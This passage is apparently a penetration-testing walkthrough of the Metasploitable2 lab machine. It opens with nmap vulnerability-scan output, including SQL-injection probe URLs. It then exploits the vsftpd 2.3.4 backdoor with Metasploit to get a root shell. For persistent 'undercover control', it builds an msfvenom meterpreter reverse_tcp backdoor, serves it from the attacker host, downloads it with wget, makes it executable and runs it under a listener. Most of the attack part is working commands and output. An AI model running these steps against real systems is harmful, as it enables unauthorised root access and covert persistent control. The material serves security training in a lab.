| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-hints%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?do=toggle-security%27%20OR%20sqlspider&page=pen-test-tool-lookup.php
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=dns-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-poll.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=credits.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=captured-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=secret-administrative-pages.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fhow-to-access-Mutillidae-over-Virtual-Box-network.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=home.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=browser-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=login.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=arbitrary-file-inclusion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=add-to-your-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=password-generator.php%27%20OR%20sqlspider&username=anonymous
| http://192.168.43.120:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=set-background-color.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=site-footer-xss-discussion.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=change-log.htm%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=installation.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=source-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=user-info.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/?page=view-someones-blog.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
| http://192.168.43.120:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
| Possible sqli for forms:
| Form at path: /mutillidae/index.php, form's action: index.php. Fields that might be vulnerable:
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
| choice
|_ initials
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
512/tcp open exec
513/tcp open login
514/tcp open shell
1099/tcp open rmiregistry
| rmi-vuln-classloader:
| VULNERABLE:
| RMI registry default configuration remote code execution vulnerability
| State: VULNERABLE
| Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution.
|
| References:
|_ https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/misc/java_rmi_server.rb
1524/tcp open ingreslock
2049/tcp open nfs
2121/tcp open ccproxy-ftp
3306/tcp open mysql
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown:
5432/tcp open postgresql
| ssl-ccs-injection:
| VULNERABLE:
| SSL/TLS MITM vulnerability (CCS Injection)
| State: VULNERABLE
| Risk factor: High
| OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
| does not properly restrict processing of ChangeCipherSpec messages,
| which allows man-in-the-middle attackers to trigger use of a zero
| length master key in certain OpenSSL-to-OpenSSL communications, and
| consequently hijack sessions or obtain sensitive information, via
| a crafted TLS handshake, aka the "CCS Injection" vulnerability.
|
| References:
| http://www.openssl.org/news/secadv_20140605.txt
| http://www.cvedetails.com/cve/2014-0224
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
| ssl-dh-params:
| VULNERABLE:
| Diffie-Hellman Key Exchange Insufficient Group Strength
| State: VULNERABLE
| Transport Layer Security (TLS) services that use Diffie-Hellman groups
| of insufficient strength, especially those using one of a few commonly
| shared groups, may be susceptible to passive eavesdropping attacks.
| Check results:
| WEAK DH GROUP 1
| Cipher Suite: TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
| Modulus Type: Safe prime
| Modulus Source: Unknown/Custom-generated
| Modulus Length: 1024
| Generator Length: 8
| Public Key Length: 1024
| References:
|_ https://weakdh.org
| ssl-poodle:
| VULNERABLE:
| SSL POODLE information leak
| State: VULNERABLE
| IDs: BID:70574 CVE:CVE-2014-3566
| The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
| products, uses nondeterministic CBC padding, which makes it easier
| for man-in-the-middle attackers to obtain cleartext data via a
| padding-oracle attack, aka the "POODLE" issue.
| Disclosure date: 2014-10-14
| Check results:
| TLS_RSA_WITH_AES_128_CBC_SHA
| References:
| https://www.securityfocus.com/bid/70574
| https://www.openssl.org/~bodo/ssl-poodle.pdf
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
|_ https://www.imperialviolet.org/2014/10/14/poodle.html
|_sslv2-drown:
5900/tcp open vnc
|_sslv2-drown:
6000/tcp open X11
6667/tcp open irc
|_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. See http://seclists.org/fulldisclosure/2010/Jun/277
8009/tcp open ajp13
8180/tcp open unknown
| http-cookie-flags:
| /admin/:
| JSESSIONID:
| httponly flag not set
| /admin/index.html:
| JSESSIONID:
| httponly flag not set
| /admin/login.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin.html:
| JSESSIONID:
| httponly flag not set
| /admin/account.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.html:
| JSESSIONID:
| httponly flag not set
| /admin/home.html:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.html:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.html:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.html:
| JSESSIONID:
| httponly flag not set
| /admin/cp.html:
| JSESSIONID:
| httponly flag not set
| /admin/index.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/home.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/controlpanel.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin-login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/cp.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/account.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/admin_login.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/adminLogin.jsp:
| JSESSIONID:
| httponly flag not set
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html:
| JSESSIONID:
| httponly flag not set
| /admin/jscript/upload.html:
| JSESSIONID:
|_ httponly flag not set
| http-enum:
| /admin/: Possible admin folder
| /admin/index.html: Possible admin folder
| /admin/login.html: Possible admin folder
| /admin/admin.html: Possible admin folder
| /admin/account.html: Possible admin folder
| /admin/admin_login.html: Possible admin folder
| /admin/home.html: Possible admin folder
| /admin/admin-login.html: Possible admin folder
| /admin/adminLogin.html: Possible admin folder
| /admin/controlpanel.html: Possible admin folder
| /admin/cp.html: Possible admin folder
| /admin/index.jsp: Possible admin folder
| /admin/login.jsp: Possible admin folder
| /admin/admin.jsp: Possible admin folder
| /admin/home.jsp: Possible admin folder
| /admin/controlpanel.jsp: Possible admin folder
| /admin/admin-login.jsp: Possible admin folder
| /admin/cp.jsp: Possible admin folder
| /admin/account.jsp: Possible admin folder
| /admin/admin_login.jsp: Possible admin folder
| /admin/adminLogin.jsp: Possible admin folder
| /manager/html/upload: Apache Tomcat (401 Unauthorized)
| /manager/html: Apache Tomcat (401 Unauthorized)
| /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
| /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
| /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_ /webdav/: Potentially interesting folder
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| http://ha.ckers.org/slowloris/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 330.59 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
The above output shows the list of vulnerabilities and they are as follows:
actually with the below output result and we will do vulnerability analysis via FTP (vsftpd service)
PORT STATE SERVICE
21/tcp open ftp
| ftp-vsftpd-backdoor:
| VULNERABLE:
| vsFTPd version 2.3.4 backdoor
| State: VULNERABLE (Exploitable)
|_sslv2-drown:
The attack Procedure
we can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.
The concept of the attack on VSFTPD 2.3.4 is to trigger the malicious execution, results in opening the backdoor on port 6200 of the system.
Let's Exploiting
The following result of the vulnerabole sourece code will make things much clearer:
- else if((p_str->p_buf[i]==0x3a)
- && (p_str->p_buf[i+1]==0x29))
- {
- vsf_sysutil_extra();
- }
}
We can clearly see that if the bytes in the network buffer match the backdoor sequence of 0x3a (colon) and 0x29, the malicious function is triggered.
Furthermore, is we explore the details of the malicious function, we can see the following function definition for the malicious function:
Click Here For More Info - https://pastebin.com/AetT9sS5
sa.sin_port=6200 serves as the backdoor port and all the commands sent to the service get executed using the execl("/bin/sh","sh",(char *)0); function.
Vulnerability analysis of VSFTPD 2.3.4 backdoor
After modeling threats, let us load the matching module into Metasploit using the use exploit/unix/ftp/vsftpd_234_backdoor command and analyze the vulnerability details using info command as follows:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > search vsftpd
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 >
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > info
Name: VSFTPD v2.3.4 Backdoor Command Execution
Module: exploit/unix/ftp/vsftpd_234_backdoor
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2011-07-03
Provided by:
hdm
MC
Available targets:
Id Name
-- ----
0 Automatic
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 21 yes The target port (TCP)
Payload information:
Space: 2000
Avoid: 0 characters
Description:
This module exploits a malicious backdoor that was added to the
VSFTPD download archive. This backdoor was introduced into the
vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011
according to the most recent information available. This backdoor
was removed on July 3rd 2011.
References:
OSVDB (73573)
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
Now we are going to add RHOST, RPORT, show payload, use payload and check about these options & finally we will exploit...
We can see that the vulnerability was allegedly added to the vsftpd archive between the dates mentioned in the description of the module.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
And as you can after exploiting we can do many things but one thing is that one problem here and problem is how to maintain accessability with these exploitation because after exit from the exploitation then it will destroy the session and after that we have to exploit again to get access or run the command
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
whoami
root
pwd
/
ls
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz
ls -la
total 125
drwxr-xr-x 21 root root 4096 May 20 2012 .
drwxr-xr-x 21 root root 4096 May 20 2012 ..
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13500 Jul 9 13:48 dev
drwxr-xr-x 94 root root 4096 Jul 9 14:41 etc
drwxr-xr-x 7 root root 4096 Jun 2 05:32 home
drwxr-xr-x 2 root root 4096 Mar 16 2010 initrd
lrwxrwxrwx 1 root root 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server
drwxr-xr-x 13 root root 4096 May 13 2012 lib
drwx------ 2 root root 16384 Mar 16 2010 lost+found
drwxr-xr-x 4 root root 4096 Mar 16 2010 media
drwxr-xr-x 3 root root 4096 Apr 28 2010 mnt
-rw------- 1 root root 41871 Jul 9 13:49 nohup.out
drwxr-xr-x 2 root root 4096 Mar 16 2010 opt
dr-xr-xr-x 118 root root 0 Jul 9 13:48 proc
drwxr-xr-x 13 root root 4096 Jul 9 13:49 root
drwxr-xr-x 2 root root 4096 May 13 2012 sbin
drwxr-xr-x 2 root root 4096 Mar 16 2010 srv
drwxr-xr-x 12 root root 0 Jul 9 13:48 sys
drwxrwxrwt 4 root root 4096 Jul 9 14:07 tmp
drwxr-xr-x 12 root root 4096 Apr 28 2010 usr
drwxr-xr-x 14 root root 4096 Mar 17 2010 var
lrwxrwxrwx 1 root root 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server
Post Exploitation
After gaining knowledge about this vulnerability and gaining access, let us now exploit once again because we want to access of this vuln to maintain and undercover control in ownself. Let us now exploit the target system. Let us see what options we need to set before firing the exploit onto the target. we can do this by running the show options command, as shown following..
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 192.168.43.120
RHOST => 192.168.43.120
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RPORT 21
RPORT => 21
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
We can see that we have only two options, which are RHOST and RPORT, we set RHOST as the IP address of the target and RPORT as 21, which is the port of the vulnerable FTP server.
Next we can check for the matching payloads via the show payloads command to see what payloads are suitable for this particular exploit module.we can see only a single payload which is payload/cmd/unix/interact. We can use this payload using the set payload cmd/unix/interact command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set payload payload/cmd/unix/interact
payload => cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit
[*] 192.168.43.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.43.120:21 - USER: 331 Please specify the password.
[+] 192.168.43.120:21 - Backdoor service has been spawned, handling...
[+] 192.168.43.120:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.43.120:6200) at 2021-07-10 00:21:53 +0530
whoami
root
pwd
/
Vola!! we got it we goot root access to the target system. So, what's next? Since wehave got a simple shell, let us try gaining better control over the target by spawning a meterpreter shell.
In order to maintain the access and meterpreter shell, we need to create a client-oriented payload, upload it to the target system, and execute it. so, lets get started....
sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf
This is own IP 192.168.43.152...
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.43.152 LPORT=4444 -f elf > backdoor.elf
[sudo] password for hackerboy:
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ ls
backdoor.elf ip.txt livehosts.txt osdetails.txt vapt-report.txt vuln.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
We can use a great utility called msfvenom to generate a meterpreter payload, as shown in the preceding screenshot. The -p switch defines the payload to use, while LHOST and LPORT define our IP address and port number that backdoor.elf file will connect to in order to provide us meterpreter access to the target. The -f switch defines the ourput type, and elf is the default extension for the linux-based systems.
But what happend next, shall we go to our victim's system and do post-exploitation? No, nothing like this is going to happen, we will maintain access to materpreter shell through exploit and if you say, with the help of apache server on our system, we will upload the shell to the victim's system.
If your Victim is on another network means away from you, then we can buy and host a server for this and then upload it onto the target machine.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo service apache2 start
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo mv backdoor.elf /var/www/html/
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$
whoami
root
pwd
/
wget http://192.168.43.152/backdoor.elf
--16:06:29-- http://192.168.43.152/backdoor.elf
=> `backdoor.elf'
Connecting to 192.168.43.152:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
0K 100% 7.65 MB/s
16:06:29 (7.65 MB/s) - `backdoor.elf' saved [207/207]
We can download the file via the wget command, as shown in the preceding screenshot. Now, in order to allow the victim system to communicate with Metasploit, we need to set up an exploit handler on our system. The handler will allow communication between the target and Metasploit using the same port and payload we used in the backdoor.elf file.
OR (2nd method to upload a backdoor file in our victim machine)
We can upload a backdoor in our victim's machine by python's http.server..like this
┌──(hackerboy㉿KumarAtulJaiswal)-[/var/www/html/backdoor]
└─$ python3 -m http.server 1234 1 ⨯
Serving HTTP on 0.0.0.0 port 1234 (http://0.0.0.0:1234/) ...
192.168.43.120 - - [10/Jul/2021 01:36:03] "GET /backdoor.elf HTTP/1.0" 200 -
and after then, in out victim's machine , we get a backdoor file via wget command :-
whoami
root
pwd
/
wget http://127.0.0.1/backdoor.elf
--2021-07-10 00:47:02-- http://127.0.0.1/backdoor.elf
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 207
Saving to: ‘backdoor.elf’
backdoor.elf 100%[===========================================================>] 207 --.-KB/s in 0s
2021-07-10 00:47:02 (23.1 MB/s) - ‘backdoor.elf’ saved [207/207]
We issue use exploit/multi/handler on a separate terminal in Metasploit and set the payload type as linux/x86/meterpreter/reverse_tcp. Next, we set the listening port via set LPORT 4444 and LHOST as our local IP address. We can now run the module using the exploit command and wait for the incoming connections.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/vapt-report-metasploitable2]
└─$ sudo msfconsole -q
This copy of metasploit-framework is more than two weeks old.
Consider running 'msfupdate' to update to the latest version.
msf6 > use exploit/multi/handler
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > set LHOST 192.168.43.152
LHOST => 192.168.43.152
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.152:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler...
When we download the file onto the target, we provide appropriate permissions to the file via the chmod command, as shown in the following screenshot:
chmod 777 backdoor.elf
ls -la
total 129
drwxr-xr-x 21 root root 4096 Jul 9 16:18 .
drwxr-xr-x 21 root root 4096 Jul 9 16:18 ..
-rwxrwxrwx 1 root root 207 Jul 9 16:17 backdoor.elf
drwxr-xr-x 2 root root 4096 May 13 2012 bin
drwxr-xr-x 4 root root 1024 May 13 2012 boot
lrwxrwxrwx 1 root root 11 Apr 28 2010 cdrom -> media/cdrom
drwxr-xr-x 14 root root 13500 Jul 9 15:53 dev
drwxr-xr-x 94 root root 4096 Jul 9 16:19 etc
drwxr-xr-x 7 root root 4096 Jun 2 05:32 home
....
./backdoor.elf
Providing the 777 permission will grant all the relevant read, write, and execute permissions on the file. Execute the file, and now switch to the other terminal, which is running our exploit handler:
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.43.152:4444
^C[-] Exploit failed [user-interrupt]: Interrupt
[-] exploit: Interrupted
